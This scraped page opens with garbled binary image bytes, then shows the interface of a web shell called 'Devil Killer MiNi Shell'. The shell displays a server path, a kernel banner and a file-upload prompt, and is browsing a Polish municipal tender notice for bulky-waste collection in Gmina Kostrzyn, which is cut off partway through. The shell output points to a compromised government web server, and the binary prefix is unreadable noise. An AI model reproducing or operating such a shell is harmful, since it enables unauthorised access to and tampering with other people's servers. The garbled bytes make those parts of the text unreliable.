JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231110/0048846301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Odbiór, transport i zagospodarowanie odpadów wystawkowych z terenu Gminy Kostrzyn </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Kostrzyn</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 631259554</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Dworcowa 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kostrzyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-025</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL418 - Poznański</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 61 8178 565</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 61 8178 191</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@kostrzyn.wlkp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kostrzyn.wlkp.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Odbiór, transport i zagospodarowanie odpadów wystawkowych z terenu Gminy Kostrzyn </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-518d178a-7fc5-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00488463</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00018595/11/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.7 Odbiór, transport i zagospodarowanie odpadów wystawkowych z terenu Gminy Kostrzyn</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-518d178a-7fc5-11ee-a60c-9ec5599dddc1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl, w zakresie dotyczącym składania ofert oraz oświadczenia składanego na podstawie art. 125 ustawy Prawo zamówień publicznych. <br/>2.	Zamawiający dopuszcza możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń (innych niż dołączanych do oferty) za pośrednictwem środków komunikacji elektronicznej w postaci e-mail: przetargi@kostrzyn.pl <br/>3.	Korzystanie z Platformy e-Zamówienia jest bezpłatne. <br/>4.	Postępowanie można wyszukać ze strony głównej Platformy e-Zamówienia (przycisk „Przeglądaj postępowania/konkursy”). <br/>5.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”. <br/>6.	Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania do Platformy e-Zamówienia. <br/>7.	Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w „Centrum pomocy” platformy e-Zamówienia pod adresem https://ezamowienia.gov.pl/pl/komponent-edukacyjny/ <br/>8.	Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”) lub na adres e-mail określony: przetargi@kostrzyn.wlkp.pl . <br/>9.	Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia. <br/>10.	Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”. <br/>11.	Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza). Przy komunikacji drogą mailową wielkość pliku wynosi maksymalnie 500 MB. <br/>12.	Do przygotowania oferty konieczne jest posiadanie przez osobę upoważnioną do reprezentowania Wykonawcy kwalifikowanego podpisu elektronicznego, podpisu osobistego lub podpisu zaufanego. <br/>13.	W przypadku przekazywania dokumentu elektronicznego w formacie poddającym dane kompresji, opatrzenie pliku zawierającego skompresowane dokumenty kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, jest równoznaczne z opatrzeniem wszystkich dokumentów zawartych w tym pliku odpowiednio kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. <br/>14.	Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z rozdziałem XXVIII SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z rozdziałem XXVIII SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZI.271.1.23.2023.IN</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest jednorazowy odbiór, transport i zagospodarowanie odpadów wystawkowych z terenu Gminy Kostrzyn. <br/>2.	Gmina Kostrzyn to gmina wiejsko- miejska położona w województwie wielkopolskim, w powiecie poznańskim. Powierzchnia Gminy Kostrzyn wynosi 155 km2, w tym powierzchnia Miasta Kostrzyna - 8 km2. Liczba miejscowości znajdujących się łącznie na terenie Gminy Kostrzyn wynosi 33. Przez obszar Gminy prowadzi droga krajowa o znaczeniu międzynarodowym nr 92 Berlin – Warszawa - Moskwa oraz droga wojewódzka nr 434. Kilka kilometrów od południowej granicy Gminy przebiega autostrada A2, z którą Gmina ma zapewnioną bardzo dobrą dostępność komunikacyjną poprzez drogę ekspresową S-5. Ponadto przez środek Gminy przebiega linia kolejowa E-20 Berlin- Warszawa. <br/>3.	Zakres przedmiotowy zamówienia obejmuje: <br/>1) odbiór odpadów wystawkowych tzn. odpadów komunalnych, które ze względu na swój rozmiar, wagę, bądź rodzaj nie mogę być umieszczone w pojemnikach lub workach przeznaczonych do zbierania odpadów komunalnych, od właścicieli nieruchomości zamieszkałych i mieszanych w części zamieszkałej położonych na terenie Gminy Kostrzyn (województwo wielkopolskie, powiat poznański), którzy pozostają w gminnych systemie odbioru odpadów komunalnych, u źródła ( z miejsca gromadzenia odpadów) z podziałem na: <br/>a)	meble i inne odpady wielkogabarytowe- odpady komunalne, które ze względu na swój rozmiar bądź wagę nie mogą być umieszczane w pojemnikach przeznaczonych do zbierania odpadów komunalnych, w szczególności meble, wózki dziecięce i inwalidzkie, dywany, wykładziny, materace, rowery, zabawki, deski do prasowania, skrzydła drzwiowe; <br/>b)	zużyte opony z pojazdów o dopuszczalnej masie całkowitej do 3,5 ton- zużyte opony pojazdów jednośladowych i samochodowych (z pojazdów o masie całkowitej do 3,5 t); <br/>c)	zużyty sprzęt pochodzących z gospodarstw domowych- odpady w rozumieniu art. 4 pkt 25) ustawy z dnia 11 września 2015 r. o zużytym sprzęcie elektrycznym i elektronicznym ( t.j. Dz. U. z 2022 r., poz. 1622); <br/>Z zastrzeżeniem, iż do odpadów wystawkowych nie zaliczamy części samochodowych oraz odpadów budowalnych i rozbiórkowych o charakterze komunalnym, w szczególności stolarki okiennej, ościeżnic drzwiowych, części instalacji w postaci np. rur, paneli podłogowych i ściennych, papy; <br/>2)	transport odebranych odpadów komunalnych, o których mowa w pkt. 1 do miejsca zbierania (zagospodarowania) odpadów, w którym zgodnie z przepisami prawa dozwolone jest zbieranie odpadów, zapewnionego przez Wykonawcę i wskazanego w ofercie, <br/>3)	przekazanie celem zagospodarowania odpadów komunalnych, o których mowa w pkt. 1 do instalacji do odzysku lub unieszkodliwiania odpadów, zgodnie z hierarchią postepowania <br/>z odpadami, o której mowa w art. 17 ustawy z dnia 14 grudnia 2021 r. o odpadach (t.j. Dz. U. <br/>z 2023 r., poz. 1387), zapewnionej/ zapewnionych przez Wykonawcę i wskazanej/wskazanych <br/>w ofercie. <br/>4.	Realizacja zmówienia odbywa się zgodnie z przepisami prawa i postanowieniami Opisu Przedmiotu Zamówienia. Wykonawca zobowiązany jest zapewnić, aby realizacja usługi odbywała się zgodnie z wymaganiami w zakresie ochrony środowiska oraz bezpieczeństwa życia i zdrowia ludzi, w tym w sposób uwzględniających właściwości chemiczne i fizyczne odpadów oraz zagrożenia, które mogą one powodować. W szczególności Wykonawca zabezpiecza przewożone odpady przed wysypaniem, rozwianiem lub wyciekiem. W przypadku wystąpienia jednego z ww. zdarzeń Wykonawca jest zobowiązany do natychmiastowego uprzątnięcia jego skutków. <br/>5.	Szczegółowy harmonogram i termin realizacji usługi zostanie uzgodniony w momencie podpisywania umowy. <br/>6.	Szacunkowa masa odpadów wystawkowych to: 170 Mg. <br/>7.	Szacowana liczba nieruchomości, z których nastąpi odbiór odpadów wystawkowych wynosi: <br/>a) dla nieruchomości zamieszkałych: <br/>-	jednorodzinnych do 4 lokali mieszkalnych 4572 szt. <br/>-	wielorodzinnych powyżej 4 lokali mieszkalnych 160 szt. <br/>b) dla nieruchomości mieszanych: <br/>-	jednorodzinnych do 4 lokali mieszkalnych 85 szt. <br/>-	wielorodzinnych powyżej 4 lokali mieszkalnych 15 szt. <br/>8.	Planowana ilość odpadów ma charakter szacunkowy i rzeczywista ilość odpadów, które Wykonawca odbierze od Zamawiającego i zagospodaruje może odbiegać od ilości podanej powyższej. Zamawiający będzie realizował zamówienie według rzeczywistych potrzeb, do wysokości kwoty jaką zamierza przeznaczyć na realizację zamówienia, a do rozliczenia posłużą ceny jednostkowe, podane w ofercie. (Uwaga. Kwota jaką Zamawiający zamierza przeznaczyć na realizację zamówienia zostanie podana przed otwarciem ofert). <br/>9.	Odbiór odpadów wystawkowych odbywa się z danej nieruchomości w ustalonym terminie zgodnie z wykazem adresów, który zostanie przekazany po podpisaniu umowy.<br/>10.	W przypadku pozostawienia przez właściciela nieruchomości odpadów innych niż wystawkowe, Wykonawca nie odbiera tych odpadów i zobligowany jest do przekazania takiej informacji w formie e-maila Zamawiającemu ze wskazaniem adresu nieruchomości. <br/>11.	Wykonawca po dokonanym odbiorze, zobowiązuje się pozostawić teren nieruchomości w należytym porządku. <br/>12.	Wykonawca jest obowiązany naprawić i zapewnić na swój koszt naprawę szkód wyrządzonych w majątku osób trzecich podczas wykonywania usługi (uszkodzenia chodników, ogrodzeń, wjazdów, itp.).<br/>13.	Wykonawca odpowiada za zapewnienie wymaganej prawem jakości świadczenia usługi transportu odpadów, w tym poprzez zapewnienie odpowiedniej ilości pojazdów, spełniających wymogi zarówno w zakresie dopuszczenia do ruchu drogowego, jak i w zakresie transportu odpadów.<br/>14.	Wykonawca zapewni, aby pojazdy były zarejestrowane i dopuszczone do ruchu oraz posiadały aktualne badania techniczne i świadectwa dopuszczenia do ruchu zgodnie z przepisami o ruchu drogowym.<br/>15.	Pojazdy wykorzystane do realizacji zamówienia muszą być oznaczone, co najmniej danymi identyfikującymi Wykonawcę, tj. firma oraz dane kontaktowe (dane adresowe i nr telefonu).<br/>16.	Wykonawca zapewni, aby pojazdy, o których mowa spełniały co najmniej normę EURO 5.<br/>17.	Wykonawca ma obowiązek wyposażyć wszystkie pojazdy wykorzystywane do realizacji zamówienia w system monitoringu bazujący na systemie pozycjonowania satelitarnego, umożliwiający trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdów miejscach postoju. <br/>18.	W razie awarii pojazdu, Wykonawca zobowiązany jest do zapewnienia pojazdu zastępczego o takich samych, bądź zbliżonych parametrach, w celu niedopuszczenia do opóźnień w odbiorze. Każdorazowa informacja o takim zdarzeniu jest niezwłocznie przekazywana Zamawiającemu na adres e-mail: gok@kostrzyn.wlkp.pl.<br/>19.	Wykonawca zobowiązany jest przekazać Zamawiającemu nie później niż w terminie 7 dni przed rozpoczęciem świadczenia usługi wykaz pojazdów spełniających wskazane wymagania.<br/>20. Wysokość wynagrodzenia Wykonawcy ustalana jest jako iloczyn rzeczywiście odebranych, przetransportowanych i przekazanych do zagospodarowania odpadów z terenu Gminy Kostrzyn, ilości odpadów oraz cen jednostkowych za odbiór, transport i zagospodarowanie 1 Mg odpadów wskazanej w ofercie Wykonawcy.<br/>21.	Wynagrodzenie płatne będzie wyłącznie za wykonaną usługę, na podstawie przedstawionej faktury, do której należy dołączyć karty przekazania odpadów. <br/>22.	Zamawiający zastrzega sobie prawo do bieżącej kontroli odbioru odpadów wystawkowych. Kontrola może odbywać się bezpośrednio w terenie w trakcie realizacji usługi odbioru odpadów, jak również na podstawie zapisów GPS z pojazdu, które Wykonawca zobowiązany jest przedstawić na każde żądanie Zamawiającego. <br/>23.	W przypadku stwierdzenia przez Zamawiającego nieprawidłowości w zakresie realizacji zamówienia, np. braku odbioru, Wykonawca będzie zobowiązany dokonać odbioru ze wskazanej lokalizacji w ciągu 48 godzin od momentu mailowego lub telefonicznego zgłoszenia nieprawidłowości przez Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90511000-2 - Usługi wywozu odpadów</p> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <p class="mb-0">90513100-7 - Usługi wywozu odpadów pochodzących z gospodarstw domowych</p> <p class="mb-0">90533000-2 - Usługi gospodarki odpadami</p> <p class="mb-0">90513000-6 - Usługi obróbki i usuwania odpadów, które nie są niebezpieczne</p> <p class="mb-0">38112100-4 - Globalne systemy nawigacji i pozycjonowania (GPS lub równorzędne)</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przy świadczeniu usługi będącej przedmiotem zamówienia przewiduje zastosowanie prawa opcji, o którym mowa w art. 441 ust. 1 ustawy Pzp., jednakże niepowodującej wzrostu wysokości wynagrodzenia Wykonawcy o więcej niż 30% względem pierwotnie ustalonej wysokości wynagrodzenia Wykonawcy. <br/>Szczegółowe zasady, sposób oraz zakres w jakim Zamawiający ma prawo do skorzystania przez Zamawiającego z opcji określa §10 ust. 4 projektowanych postanowień umowy stanowiących Załącznik nr 2 do SWZ. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień z wolnej ręki, o których mowa <br/>w art. 214 ust. 1 pkt 7 ustawy Pzp o łącznej wartości do 30% wartości zamówienia podstawowego. Zamówienia te polegać będą na powtórzeniu tego samego rodzaju usług, które objęte były zamówieniem podstawowym, przy zastosowaniu stawek, cen jednostkowych – zgodnie ze złożoną ofertą w postępowaniu na zadanie podstawowe, a w przypadku ich braku na podstawie indywidualnych negocjacji, w szczególności:<br/>1)	odbioru, transportu i zagospodarowania odpadów wystawkowych w większej ilości niż przewidziana w Rozdziale IV niniejszej SWZ, w tym również po ewentualnym zwiększeniu wskazanego limitu na skutek skorzystania przez Zamawiającego z prawa opcji.<br/>2)	realizacji usługi odbioru, transportu i zagospodarowania odpadów komunalnych w innym terminie niż wskazany w Rozdziale II SWZ.<br/>Warunki, na jakich będą udzielone ww. zamówienia, będą odpowiadały warunkom określonym <br/>w dokumentacji niniejszego postępowania, przez co w szczególności należy rozumieć warunki realizacji usług szczegółowo opisane w projektowanych postanowieniach umowy stanowiących Załącznik nr 2 do SWZ.<br/>Zamawiający uwzględnił całkowitą wartość tego zamówienia przy obliczaniu wartości niniejszego zamówienia publicznego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z rozdziałem XXI SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium środowiskowe: norma emisji spalin pojazdów, które będą użyte do realizacji przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty środowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, spełniający warunki, o których mowa <br/>w art. 112 ust. 2 ustawy Pzp, i którzy wykażą ich spełnianie na poziomie wymaganym przez Zamawiającego zgodnie z 